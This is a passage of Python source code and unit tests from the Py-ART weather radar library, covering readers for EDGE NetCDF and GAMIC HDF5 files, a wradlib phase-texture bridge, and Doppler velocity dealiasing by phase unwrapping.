fields = {field_name: filemetadata(field_name)}
fields[field_name]['data'] = field_data
fields[field_name]['units'] = dset.variables[field_name].Units
fields[field_name]['_FillValue'] = get_fillvalue()
# instrument_parameters
instrument_parameters = {}
if 'PRF-value' in dset.ncattrs():
dic = filemetadata('prt')
prt = 1. / float(dset.getncattr('PRF-value'))
dic['data'] = np.ones((nrays, ), dtype='float32') * prt
instrument_parameters['prt'] = dic
if 'PulseWidth-value' in dset.ncattrs():
dic = filemetadata('pulse_width')
pulse_width = dset.getncattr('PulseWidth-value') * 1.e-6
dic['data'] = np.ones((nrays, ), dtype='float32') * pulse_width
instrument_parameters['pulse_width'] = dic
if 'NyquistVelocity-value' in dset.ncattrs():
dic = filemetadata('nyquist_velocity')
nyquist_velocity = float(dset.getncattr('NyquistVelocity-value'))
dic['data'] = np.ones((nrays, ), dtype='float32') * nyquist_velocity
instrument_parameters['nyquist_velocity'] = dic
if 'Beamwidth' in dset.variables:
dic = filemetadata('radar_beam_width_h')
dic['data'] = dset.variables['Beamwidth'][:]
instrument_parameters['radar_beam_width_h'] = dic
dset.close()
return Radar(
time, _range, fields, metadata, scan_type,
latitude, longitude, altitude,
sweep_number, sweep_mode, fixed_angle, sweep_start_ray_index,
sweep_end_ray_index,
azimuth, elevation,
instrument_parameters=instrument_parameters)
```
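A minimal usage sketch for the reader above; `edge_example.nc` is a
placeholder filename for an EDGE NetCDF file on disk.
```python
import pyart.aux_io

radar = pyart.aux_io.read_edge_netcdf('edge_example.nc')
print(radar.scan_type)            # 'ppi' -- the reader handles single-sweep PPIs
print(radar.fixed_angle['data'])  # elevation angle of the sweep
print(list(radar.fields.keys()))  # the single field stored in the file
```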
#### File: pyart/aux_io/gamicfile.py
```python
import numpy as np
import h5py
class GAMICFile(object):
"""
A class to read GAMIC files.
Parameters
----------
filename : str
Filename of GAMIC HDF5 file.
Attributes
----------
nsweeps : int
Number of sweeps (or scans) in the file.
rays_per_sweep : array of int32
Number of rays in each sweep.
total_rays : int
Total number of rays in all sweeps.
start_ray, end_ray : array of int32
Index of the first (start) and last (end) ray in each sweep, 0-based.
_hfile : HDF5 file
Open HDF5 file object from which data is read.
_scans : list
Name of the HDF5 group for each scan.
"""
def __init__(self, filename):
""" initialize object. """
self._hfile = h5py.File(filename, 'r')
self.nsweeps = self._hfile['what'].attrs['sets']
self._scans = ['scan%i' % (i) for i in range(self.nsweeps)]
self.rays_per_sweep = self.how_attrs('ray_count', 'int32')
self.total_rays = sum(self.rays_per_sweep)
# starting and ending ray for each sweep
self.start_ray = np.cumsum(np.append([0], self.rays_per_sweep[:-1]))
self.end_ray = np.cumsum(self.rays_per_sweep) - 1
return
def close(self):
""" Close the file. """
self._hfile.close()
# file checks
def is_file_complete(self):
""" True if all scans in file, False otherwise. """
# check that scan0, scan1, ... scan[nsweeps-1] are present
for scan in self._scans:
if scan not in self._hfile:
return False
return True
def is_file_single_scan_type(self):
""" True is all scans are the same scan type, False otherwise. """
scan_type = self._hfile['scan0/what'].attrs['scan_type']
for scan in self._scans:
if self._hfile[scan]['what'].attrs['scan_type'] != scan_type:
return False
return True
# attribute look up
def where_attr(self, attr, dtype):
""" Return an array containing a attribute from the where group. """
return np.array([self._hfile['where'].attrs[attr]], dtype=dtype)
def how_attr(self, attr, dtype):
""" Return an array containing a attribute from the how group. """
return np.array([self._hfile['how'].attrs[attr]], dtype=dtype)
def is_attr_in_group(self, group, attr):
""" True is attribute is present in the group, False otherwise. """
return attr in self._hfile[group].attrs
def raw_group_attr(self, group, attr):
""" Return an attribute from a group with no reformatting. """
return self._hfile[group].attrs[attr]
def raw_scan0_group_attr(self, group, attr):
""" Return an attribute from the scan0 group with no reformatting. """
return self._hfile['/scan0'][group].attrs[attr]
# scan/sweep based attribute lookup
def how_attrs(self, attr, dtype):
""" Return an array of an attribute for each scan's how group. """
return np.array([self._hfile[s]['how'].attrs[attr]
for s in self._scans], dtype=dtype)
def how_ext_attrs(self, attr):
"""
Return a list of an attribute in each scan's how/extended group.
"""
return [float(self._hfile[s]['how']['extended'].attrs[attr])
for s in self._scans]
def what_attrs(self, attr, dtype):
""" Return a list of an attribute for each scan's what group. """
return np.array([self._hfile[s]['what'].attrs[attr]
for s in self._scans], dtype=dtype)
# misc looping
def moment_groups(self):
""" Return a list of groups under scan0 where moments are stored. """
return [k for k in self._hfile['/scan0'] if k.startswith('moment_')]
def moment_names(self, scan0_groups):
""" Return a list of moment names for a list of scan0 groups. """
return[self._hfile['/scan0'][k].attrs['moment'] for k in scan0_groups]
def ray_header(self, field, dtype):
""" Return an array containing a ray_header field for each sweep. """
data = np.empty((self.total_rays, ), dtype=dtype)
for scan, start, end in zip(self._scans, self.start_ray, self.end_ray):
data[start:end+1] = self._hfile[scan]['ray_header'][field]
return data
def moment_data(self, group, dtype):
""" Read in moment data from all sweeps. """
ngates = int(self._hfile['/scan0/how'].attrs['bin_count'])
data = np.ma.zeros((self.total_rays, ngates), dtype=dtype)
data[:] = np.ma.masked # volume data initially all masked
for scan, start, end in zip(self._scans, self.start_ray, self.end_ray):
# read in sweep data if field exists in scan.
if group in self._hfile[scan]:
sweep_data = _get_gamic_sweep_data(self._hfile[scan][group])
data[start:end+1, :sweep_data.shape[1]] = sweep_data[:]
return data
def sweep_expand(self, arr, dtype='float32'):
""" Expand an sweep indexed array to be ray indexed """
return np.repeat(arr, self.rays_per_sweep).astype(dtype)
def _get_gamic_sweep_data(group):
""" Get GAMIC HDF5 sweep data from an HDF5 group. """
dyn_range_min = group.attrs['dyn_range_min']
dyn_range_max = group.attrs['dyn_range_max']
raw_data = group[:]
fmt = group.attrs['format']
if fmt == 'UV16':
# unsigned 16-bit integer data, 0 indicates a masked value
assert raw_data.dtype == np.uint16
scale = (dyn_range_max - dyn_range_min) / 65535.
offset = dyn_range_min
sweep_data = np.ma.masked_array(
raw_data * scale + offset, mask=(raw_data == 0), dtype='float32')
elif fmt == 'UV8':
# unsigned 8-bit integer data, 0 indicates a masked value
assert raw_data.dtype == np.uint8
scale = (dyn_range_max - dyn_range_min) / 255.
offset = dyn_range_min
sweep_data = np.ma.masked_array(
raw_data * scale + offset, mask=(raw_data == 0), dtype='float32')
else:
raise NotImplementedError('GAMIC data format: %s', fmt)
return sweep_data
```
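A worked sketch of the UV16 decoding rule in `_get_gamic_sweep_data`: raw
16-bit counts map linearly onto `[dyn_range_min, dyn_range_max]`, with the
raw value 0 reserved for masked gates. The dynamic-range span below is
illustrative.
```python
import numpy as np

raw = np.array([0, 1, 32768, 65535], dtype=np.uint16)
dyn_range_min, dyn_range_max = -32.0, 95.5  # example reflectivity span in dBZ

scale = (dyn_range_max - dyn_range_min) / 65535.
decoded = np.ma.masked_array(raw * scale + dyn_range_min,
                             mask=(raw == 0), dtype='float32')
print(decoded)  # first gate masked; last gate equals dyn_range_max
```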
#### File: pyart/bridge/wradlib_bridge.py
```python
import wradlib
import numpy as np
from ..config import get_metadata, get_field_name
def texture_of_complex_phase(radar, phidp_field=None,
phidp_texture_field=None):
"""
Calculate the texture of the differential phase field.
The texture is computed from the real part of the complex
representation of the differential phase.
Parameters
----------
radar : Radar
Radar object containing the differential phase field.
phidp_field : str, optional
Name of field in radar which contains the differential phase shift.
None will use the default field name in the Py-ART configuration file.
phidp_texture_field : str, optional
Name to use for the differential phase texture field metadata.
None will use the default field name in the Py-ART configuration file.
Returns
-------
texture_field : dict
Field dictionary containing the texture of the real part
of the complex differential phase.
References
----------
<NAME>., <NAME>, and <NAME>,
A fuzzy logic algorithm for the separation of precipitating from
nonprecipitating echoes using polarimetric radar observations,
Journal of Atmospheric and Oceanic Technology 24 (8), 1439-1451
"""
# parse field names
if phidp_field is None:
phidp_field = get_field_name('differential_phase')
if phidp_texture_field is None:
phidp_texture_field = get_field_name('differential_phase')
# Grab the phase data
phidp = radar.fields[phidp_field]['data']
# convert to complex number
complex_phase = np.exp(1j*(phidp*np.pi/180.0))
# calculate texture using wradlib
w_texture_complex = wradlib.dp.texture(
(np.real(complex_phase) + 1.0) * 180)
texture_field = get_metadata(phidp_texture_field)
texture_field['data'] = w_texture_complex
return texture_field
```
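A usage sketch, assuming wradlib is installed. The synthetic radar from
`pyart.testing` ships without a differential phase field, so a fake one is
added first purely for illustration.
```python
import numpy as np
import pyart

radar = pyart.testing.make_target_radar()
phidp = {'data': np.random.uniform(0., 180., (radar.nrays, radar.ngates)),
         'units': 'degrees'}
radar.add_field('differential_phase', phidp)

texture = pyart.bridge.texture_of_complex_phase(radar)
radar.add_field('differential_phase_texture', texture)
```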
#### File: core/tests/test_grid.py
```python
from __future__ import print_function
import numpy as np
import pyart
COMMON_MAP_TO_GRID_ARGS = {
'grid_shape': (3, 9, 10),
'grid_limits': ((-400.0, 400.0), (-900.0, 900.0), (-900, 900)),
'fields': ['reflectivity'],
'roi_func': lambda z, y, x: 30, }
def test_grid_from_radars():
radar = pyart.testing.make_target_radar()
grid = pyart.map.grid_from_radars((radar,), **COMMON_MAP_TO_GRID_ARGS)
with pyart.testing.InTemporaryDirectory():
tmpfile = 'tmp_grid.nc'
grid.write(tmpfile)
grid2 = pyart.io.read_grid(tmpfile)
# check metadata
for k, v in grid.metadata.items():
print("Checking key:", k, "should have value:", v)
print(grid2.metadata)
assert grid2.metadata[k] == v
# check axes
for axes_key in grid.axes.keys():
for k, v in grid.axes[axes_key].items():
print("Checking axes_key:", axes_key, "key:", k)
if k == 'data':
assert np.all(grid2.axes[axes_key][k] == v)
else:
assert grid2.axes[axes_key][k] == v
# check fields
for field in grid.fields.keys():
for k, v in grid.fields[field].items():
print("Checking field:", field, "key:", k)
if k == 'data':
assert np.all(grid2.fields[field][k] == v)
else:
assert grid2.fields[field][k] == v
```
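The mapping step the test exercises, as a standalone sketch: a synthetic
radar is gridded onto a small Cartesian volume with a constant 30 m radius
of influence.
```python
import pyart

radar = pyart.testing.make_target_radar()
grid = pyart.map.grid_from_radars(
    (radar,),
    grid_shape=(3, 9, 10),
    grid_limits=((-400., 400.), (-900., 900.), (-900., 900.)),
    fields=['reflectivity'],
    roi_func=lambda z, y, x: 30)  # constant radius of influence in metres
print(grid.fields['reflectivity']['data'].shape)  # (3, 9, 10)
```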
#### File: core/tests/test_radar.py
```python
import sys
# we need a class which excepts str for writing in Python 2 and 3
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import inspect
import numpy as np
from numpy.testing import assert_raises
import pyart
def test_rays_per_sweep_attribute():
radar = pyart.testing.make_target_radar()
rays_per_sweep = radar.rays_per_sweep
assert isinstance(rays_per_sweep, dict)
assert rays_per_sweep['data'].shape == (1, )
assert rays_per_sweep['data'][0] == 360
def test_iterators():
radar = pyart.testing.make_empty_ppi_radar(30, 20, 5)
radar.fields['reflectivity'] = {
'data': np.zeros((100, 30), dtype=np.float32)}
starts = [0, 20, 40, 60, 80]
ends = [19, 39, 59, 79, 99]
starts_ends = [(s, e) for s, e in zip(starts, ends)]
assert inspect.isgenerator(radar.iter_start())
assert [s for s in radar.iter_start()] == starts
assert inspect.isgenerator(radar.iter_end())
assert [s for s in radar.iter_end()] == ends
assert inspect.isgenerator(radar.iter_start_end())
assert [s for s in radar.iter_start_end()] == starts_ends
assert inspect.isgenerator(radar.iter_slice())
for s, start, end in zip(radar.iter_slice(), starts, ends):
assert s.start == start
assert s.stop == end + 1
assert s.step is None
assert inspect.isgenerator(radar.iter_field('reflectivity'))
for d in radar.iter_field('reflectivity'):
assert d.shape == (20, 30)
assert d.dtype == np.float32
assert_raises(KeyError, radar.iter_field, 'foobar')
assert inspect.isgenerator(radar.iter_azimuth())
for d in radar.iter_azimuth():
assert d.shape == (20, )
assert inspect.isgenerator(radar.iter_elevation())
for d in radar.iter_elevation():
assert d.shape == (20, )
def test_get_methods():
radar = pyart.testing.make_empty_ppi_radar(30, 20, 5)
radar.fields['reflectivity'] = {
'data': np.zeros((100, 30), dtype=np.float32)}
assert radar.get_start(0) == 0
assert radar.get_start(1) == 20
assert_raises(IndexError, radar.get_start, -1)
assert_raises(IndexError, radar.get_start, 20)
assert radar.get_end(0) == 19
assert radar.get_end(1) == 39
assert_raises(IndexError, radar.get_end, -1)
assert_raises(IndexError, radar.get_end, 20)
assert radar.get_start_end(0) == (0, 19)
assert radar.get_start_end(1) == (20, 39)
assert_raises(IndexError, radar.get_start_end, -1)
assert_raises(IndexError, radar.get_start_end, 20)
assert radar.get_slice(0) == slice(0, 20)
assert radar.get_slice(1) == slice(20, 40)
assert_raises(IndexError, radar.get_slice, -1)
assert_raises(IndexError, radar.get_slice, 20)
data = radar.get_field(0, 'reflectivity')
assert data.shape == (20, 30)
assert data.dtype == np.float32
data = radar.get_field(1, 'reflectivity')
assert data.shape == (20, 30)
assert data.dtype == np.float32
assert_raises(KeyError, radar.get_field, 0, 'foobar')
assert_raises(IndexError, radar.get_field, -1, 'reflectivity')
assert_raises(IndexError, radar.get_field, 20, 'reflectivity')
assert radar.get_azimuth(0).shape == (20, )
assert_raises(IndexError, radar.get_azimuth, -1)
assert_raises(IndexError, radar.get_azimuth, 20)
assert radar.get_elevation(0).shape == (20, )
assert_raises(IndexError, radar.get_elevation, -1)
assert_raises(IndexError, radar.get_elevation, 20)
assert_raises(LookupError, radar.get_nyquist_vel, 0)
radar.instrument_parameters = {
'nyquist_velocity': {'data': np.ones((100,))}
}
assert round(radar.get_nyquist_vel(0)) == 1
assert_raises(IndexError, radar.get_nyquist_vel, -1)
radar.instrument_parameters['nyquist_velocity']['data'][0] = 2
assert_raises(Exception, radar.get_nyquist_vel, 0)
def test_extract_sweeps():
radar = pyart.testing.make_empty_ppi_radar(100, 360, 3)
radar.fields['reflectivity'] = {'data': np.zeros((1080, 100))}
radar.fields['velocity'] = {'data': np.zeros((1080, 100))}
eradar = radar.extract_sweeps([0, 2])
# extracted radar should have 720 rays, 2 sweeps, 100 gates
assert eradar.time['data'].shape == (720, )
assert eradar.range['data'].shape == (100, )
assert eradar.metadata['instrument_name'] == 'fake_radar'
assert eradar.scan_type == 'ppi'
assert eradar.latitude['data'].shape == (1, )
assert eradar.longitude['data'].shape == (1, )
assert eradar.altitude['data'].shape == (1, )
assert eradar.altitude_agl is None
assert eradar.sweep_number['data'].shape == (2, )
assert eradar.sweep_mode['data'].shape == (2, )
assert eradar.fixed_angle['data'].shape == (2, )
assert eradar.sweep_start_ray_index['data'].shape == (2, )
assert eradar.sweep_end_ray_index['data'].shape == (2, )
assert eradar.target_scan_rate is None
assert eradar.azimuth['data'].shape == (720, )
assert eradar.elevation['data'].shape == (720, )
assert eradar.scan_rate is None
assert eradar.antenna_transition is None
assert eradar.instrument_parameters is None
assert eradar.radar_calibration is None
assert eradar.ngates == 100
assert eradar.nrays == 720
assert eradar.nsweeps == 2
assert eradar.fields['reflectivity']['data'].shape == (720, 100)
assert eradar.fields['velocity']['data'].shape == (720, 100)
def test_extract_sweeps_extra():
radar = pyart.testing.make_empty_ppi_radar(10, 36, 3)
radar.instrument_parameters = {
'prt': {'data': np.zeros((108, ))},
'prt_mode': {'data': np.array(['fixed'] * 3)},
'radar_antenna_gain_h': {'data': np.array(0)},
}
radar.radar_calibration = {
'r_calib_index': {'data': np.zeros((108, ))},
'r_calib_time': {'data': np.zeros((8, ))}
}
eradar = radar.extract_sweeps([0, 2])
instr = eradar.instrument_parameters
assert instr['prt']['data'].shape == (72, )
assert instr['prt_mode']['data'].shape == (2, )
assert instr['radar_antenna_gain_h']['data'].shape == ()
calib = eradar.radar_calibration
assert calib['r_calib_index']['data'].shape == (72, )
assert calib['r_calib_time']['data'].shape == (8, )
def test_extract_sweeps_errors():
radar = pyart.testing.make_empty_ppi_radar(10, 36, 2)
assert_raises(ValueError, radar.extract_sweeps, [0, 2])
assert_raises(ValueError, radar.extract_sweeps, [-1, 1])
def test_radar_creation():
radar = pyart.testing.make_target_radar()
assert isinstance(radar, pyart.core.Radar)
def test_add_field():
radar = pyart.testing.make_target_radar()
dic = {'data': np.zeros((360, 50)), 'standard_name': 'test'}
radar.add_field('test', dic)
assert 'test' in radar.fields
assert 'data' in radar.fields['test']
assert radar.fields['test']['standard_name'] == 'test'
def test_add_field_errors():
radar = pyart.testing.make_target_radar()
assert_raises(ValueError, radar.add_field, 'reflectivity', {})
dic = {'dat': np.zeros((360, 50)), 'standard_name': 'test'}
assert_raises(KeyError, radar.add_field, 'test', dic)
dic = {'data': np.zeros((360, 49)), 'standard_name': 'test'}
assert_raises(ValueError, radar.add_field, 'test', dic)
def test_add_field_like():
radar = pyart.testing.make_target_radar()
data = np.zeros((360, 50))
radar.add_field_like('reflectivity', 'test', data)
assert 'test' in radar.fields
assert 'data' in radar.fields['test']
assert radar.fields['test']['units'] == 'dBZ'
def test_add_field_like_bug():
# tests for bug where adding a field over-writes 'like' field
# data/metadata.
radar = pyart.testing.make_target_radar()
data = np.ones((360, 50))
radar.add_field_like('reflectivity', 'test', data)
radar.fields['test']['units'] = 'fake'
# check field added
assert radar.fields['test']['units'] == 'fake'
assert radar.fields['test']['data'][0, 0] == 1
# check original field
assert radar.fields['reflectivity']['units'] == 'dBZ'
assert radar.fields['reflectivity']['data'][0, 0] == 0
def test_add_field_like_errors():
radar = pyart.testing.make_target_radar()
assert_raises(ValueError, radar.add_field_like, 'foo', 'bar', [])
def test_info_levels():
for level in ['standard', 's', 'compact', 'c', 'full', 'f']:
yield check_info, level
def test_info_nonstandard():
# build a non-standard radar object for testing all paths in info
radar = pyart.testing.make_target_radar()
radar.fields['reflectivity']['data'] = [1, 2, 3, 4]
radar.instrument_parameters = {'foobar': {'data': [1, 2], 'bar': 'foo'}}
radar.radar_calibration = {'foobar': {'data': [1, 2], 'bar': 'foo'}}
check_info('standard', radar)
def check_info(level, radar=None):
out = StringIO()
get_info(level, out, radar)
# don't check the output, just that something was printed.
assert len(out.getvalue()) != 0
def get_info(level='standard', out=sys.stdout, radar=None):
if radar is None:
radar = pyart.testing.make_target_radar()
radar.info(level, out)
def test_info_errors():
assert_raises(ValueError, check_info, 'foo')
def test_is_vpt():
radar = pyart.testing.make_empty_ppi_radar(10, 36, 3)
assert not pyart.core.is_vpt(radar)
pyart.core.to_vpt(radar)
assert pyart.core.is_vpt(radar)
def test_to_vpt():
# single scan
radar = pyart.testing.make_empty_ppi_radar(10, 36, 3)
radar.instrument_parameters = {
'prt_mode': {'data': np.array(['fixed'] * 3)}
}
pyart.core.to_vpt(radar)
assert pyart.core.is_vpt(radar)
assert radar.nsweeps == 1
assert radar.azimuth['data'][10] == 0.0
assert radar.elevation['data'][0] == 90.0
assert len(radar.instrument_parameters['prt_mode']['data']) == 1
# multiple scans
radar = pyart.testing.make_empty_ppi_radar(10, 36, 3)
radar.instrument_parameters = {
'prt_mode': {'data': np.array(['fixed'] * 3)}
}
pyart.core.to_vpt(radar, False)
assert pyart.core.is_vpt(radar)
assert radar.nsweeps == 108
assert radar.azimuth['data'][10] == 10.0
assert radar.elevation['data'][0] == 90.0
assert len(radar.instrument_parameters['prt_mode']['data']) == 108
```
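A condensed sketch of the sweep-extraction workflow the tests above cover.
```python
import pyart

# 100 gates, 360 rays per sweep, 3 sweeps
radar = pyart.testing.make_empty_ppi_radar(100, 360, 3)
subset = radar.extract_sweeps([0, 2])  # keep the first and third sweeps
print(subset.nsweeps, subset.nrays, subset.ngates)  # 2 720 100
```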
#### File: correct/tests/test_unwrap.py
```python
from __future__ import print_function
import pyart
import numpy as np
from numpy.testing import assert_allclose
from numpy.testing import assert_raises
REF_DATA = [0.5, 1.5, 2.5, 3.5, 4.5, 5.5, 6.5, 7.5, 8.5, 9.5, 10.5, 11.5,
12.5, 13.5, 12.5, 11.5, 10.5, 9.5, 8.5, 7.5, 6.5, 5.5, 4.5, 3.5,
2.5, 1.5, 0.5]
def test_dealias_unwrap_phase_ray():
radar, dealias_vel = perform_dealias('ray')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_sweep():
radar, dealias_vel = perform_dealias('sweep')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_volume():
radar, dealias_vel = perform_dealias('volume')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_no_gatefilter():
radar, dealias_vel = perform_dealias('sweep', gatefilter=False)
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_explicit_gatefilter():
radar = pyart.testing.make_velocity_aliased_radar()
gf = pyart.correct.GateFilter(radar)
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
dealias_vel = pyart.correct.dealias_unwrap_phase(radar, gatefilter=gf)
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_masked_field_sweep():
radar = pyart.testing.make_velocity_aliased_radar()
vdata = radar.fields['velocity']['data']
radar.fields['velocity']['data'] = np.ma.masked_array(vdata)
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
radar.fields['velocity']['data'][180, 25] = np.ma.masked
dealias_vel = pyart.correct.dealias_unwrap_phase(
radar, unwrap_unit='volume')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
assert np.ma.is_masked(dealias_vel['data'][180, 25])
assert not np.ma.is_masked(dealias_vel['data'][180, 24])
def test_dealias_unwrap_phase_masked_field_volume():
radar = pyart.testing.make_velocity_aliased_radar()
vdata = radar.fields['velocity']['data']
radar.fields['velocity']['data'] = np.ma.masked_array(vdata)
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
radar.fields['velocity']['data'][180, 25] = np.ma.masked
dealias_vel = pyart.correct.dealias_unwrap_phase(
radar, unwrap_unit='volume')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
assert np.ma.is_masked(dealias_vel['data'][180, 25])
assert not np.ma.is_masked(dealias_vel['data'][180, 24])
def test_dealias_unwrap_phase_masked_field_ray():
radar = pyart.testing.make_velocity_aliased_radar()
vdata = radar.fields['velocity']['data']
radar.fields['velocity']['data'] = np.ma.masked_array(vdata)
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
radar.fields['velocity']['data'][180, 25] = np.ma.masked
dealias_vel = pyart.correct.dealias_unwrap_phase(
radar, unwrap_unit='ray')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
assert np.ma.is_masked(dealias_vel['data'][180, 25])
assert not np.ma.is_masked(dealias_vel['data'][180, 24])
def test_dealias_unwrap_phase_rhi_sweep():
radar = pyart.testing.make_velocity_aliased_rhi_radar()
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
dealias_vel = pyart.correct.dealias_unwrap_phase(radar)
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_rhi_volume():
radar = pyart.testing.make_velocity_aliased_rhi_radar()
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
dealias_vel = pyart.correct.dealias_unwrap_phase(
radar, unwrap_unit='volume')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_raises():
# invalid unwrap_unit
radar = pyart.testing.make_velocity_aliased_radar()
assert_raises(ValueError, pyart.correct.dealias_unwrap_phase, radar,
unwrap_unit='fuzz')
# no explicit nyquist
radar = pyart.testing.make_velocity_aliased_radar()
radar.instrument_parameters = None
assert_raises(LookupError, pyart.correct.dealias_unwrap_phase, radar)
# non-sequential
radar = pyart.testing.make_velocity_aliased_radar()
radar.azimuth['data'][10] = 190.
assert_raises(ValueError, pyart.correct.dealias_unwrap_phase, radar)
# non-aligned sweeps
radar = pyart.testing.make_empty_ppi_radar(1, 10, 2)
radar.fields['velocity'] = {'data': np.zeros((20, 1))}
assert_raises(ValueError, pyart.correct.dealias_unwrap_phase, radar,
nyquist_vel=10, unwrap_unit='volume')
# non-cubic radar
radar = pyart.testing.make_empty_ppi_radar(1, 10, 2)
radar.fields['velocity'] = {'data': np.zeros((20, 1))}
radar.azimuth['data'][-10:] = range(10)
radar.sweep_end_ray_index['data'][-1] = 18
assert_raises(ValueError, pyart.correct.dealias_unwrap_phase, radar,
nyquist_vel=10, unwrap_unit='volume')
# invalid scan type
radar = pyart.testing.make_velocity_aliased_radar()
radar.scan_type = 'fuzz'
assert_raises(ValueError, pyart.correct.dealias_unwrap_phase, radar)
def perform_dealias(unwrap_unit='sweep', **kwargs):
""" Perform velocity dealiasing on reference data. """
radar = pyart.testing.make_velocity_aliased_radar()
# speckling that will not be dealiased.
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
dealias_vel = pyart.correct.dealias_unwrap_phase(
radar, unwrap_unit=unwrap_unit, **kwargs)
return radar, dealias_vel
if __name__ == "__main__":
radar, dealias_vel = perform_dealias()
radar.fields['dealiased_velocity'] = dealias_vel
# print out results
print("ray 13 velocitites before dealias:")
print(radar.fields['velocity']['data'][13])
print("ray 13 velocities after dealias:")
print(radar.fields['dealiased_velocity']['data'][13])
# create plot
import matplotlib.pyplot as plt
fig = plt.figure(figsize=[5, 10])
ax1 = fig.add_subplot(2, 1, 1)
ax2 = fig.add_subplot(2, 1, 2)
rd = pyart.graph.RadarDisplay(radar)
rd.plot_ppi('velocity', 0, ax=ax1, colorbar_flag=False,
title='', vmin=-10, vmax=10)
rd.plot_ppi('dealiased_velocity', 0, ax=ax2, colorbar_flag=False,
title='', vmin=-10, vmax=20)
fig.savefig('dealias_plot.png')
```
#### File: pyart/correct/unwrap.py
```python
from __future__ import print_function
import numpy as np
from ..config import get_metadata
from ._common_dealias import _parse_fields, _parse_gatefilter
from ._common_dealias import _parse_rays_wrap_around, _parse_nyquist_vel
from ._unwrap_1d import unwrap_1d
from ._unwrap_2d import unwrap_2d
from ._unwrap_3d import unwrap_3d
def dealias_unwrap_phase(
radar, unwrap_unit='sweep', nyquist_vel=None,
check_nyquist_uniform=True, gatefilter=False,
rays_wrap_around=None, keep_original=False, vel_field=None,
corr_vel_field=None, skip_checks=False, **kwargs):
"""
Dealias Doppler velocities using multi-dimensional phase unwrapping.
Parameters
----------
radar : Radar
Radar object containing Doppler velocities to dealias.
unwrap_unit : {'ray', 'sweep', 'volume'}, optional
Unit to unwrap independently. 'ray' will unwrap each ray
individually, 'sweep' each sweep, and 'volume' will unwrap the entire
volume in a single pass. 'sweep', the default, often gives superior
results when the lower sweeps of the radar volume are contaminated by
clutter. 'ray' does not use the gatefilter parameter, and rays in which
gates are masked will dealias poorly.
nyquist_vel : array-like or float, optional
Nyquist velocity in units identical to those stored in the radar's
velocity field, either one value per sweep or a single value which will
be used for all sweeps. None will attempt to determine this value from
the Radar object. The Nyquist velocity of the first sweep is used
for all dealiasing unless unwrap_unit is 'sweep', in which case each
sweep's own Nyquist velocity is used.
check_nyquist_uniform : bool, optional
True to check if the Nyquist velocities are uniform for all rays
within a sweep, False will skip this check. This parameter is ignored
when the nyquist_velocity parameter is not None.
gatefilter : GateFilter, None or False, optional.
A GateFilter instance which specified which gates should be
ignored when performing de-aliasing. A value of None created this
filter from the radar moments using any additional arguments by
passing them to :py:func:`moment_based_gate_filter`. False, the
default, disables filtering including all gates in the dealiasing.
rays_wrap_around : bool or None, optional
True when the rays at the beginning of the sweep and end of the sweep
should be interpreted as connected when de-aliasing (PPI scans).
False if the edges should not be interpreted as connected (other scan
types). None will determine the correct value from the radar
scan type.
keep_original : bool, optional
True to retain the original Doppler velocity values at gates
where the dealiasing procedure fails or was not applied. False
performs no replacement and these gates will be masked in the corrected
velocity field.
vel_field : str, optional
Field in radar to use as the Doppler velocities during dealiasing.
None will use the default field name from the Py-ART configuration
file.
corr_vel_field : str, optional
Name to use for the dealiased Doppler velocity field metadata. None
will use the default field name from the Py-ART configuration file.
skip_checks : bool
True to skip checks verifying that an appropriate unwrap_unit is
selected; False retains these checks. Setting this parameter to True
is not recommended and is only offered as an option for extreme cases.
Returns
-------
corr_vel : dict
Field dictionary containing dealiased Doppler velocities. Dealiased
array is stored under the 'data' key.
References
----------
.. [1] <NAME>, <NAME>, <NAME>,
and <NAME>, "Fast two-dimensional phase-unwrapping
algorithm based on sorting by reliability following a noncontinuous
path", Journal Applied Optics, Vol. 41, No. 35 (2002) 7437,
.. [2] <NAME>., <NAME>., <NAME>., & <NAME>., "Fast
three-dimensional phase-unwrapping algorithm based on sorting by
reliability following a non-continuous path. In <NAME>,
<NAME>, & <NAME> (Eds.), Optical Metrology (2005) 32--40,
International Society for Optics and Photonics.
"""
vel_field, corr_vel_field = _parse_fields(vel_field, corr_vel_field)
gatefilter = _parse_gatefilter(gatefilter, radar, **kwargs)
rays_wrap_around = _parse_rays_wrap_around(rays_wrap_around, radar)
nyquist_vel = _parse_nyquist_vel(nyquist_vel, radar, check_nyquist_uniform)
if not skip_checks:
_verify_unwrap_unit(radar, unwrap_unit)
# exclude masked and invalid velocity gates
gatefilter.exclude_masked(vel_field)
gatefilter.exclude_invalid(vel_field)
gfilter = gatefilter.gate_excluded
# raw vel. data possibly with masking
raw_vdata = radar.fields[vel_field]['data']
vdata = raw_vdata.view(np.ndarray) # mask removed
# perform dealiasing
if unwrap_unit == 'ray':
# 1D unwrapping does not use the gate filter nor respect
# masked gates in the rays. No information from the radar object is
# needed for the unfolding
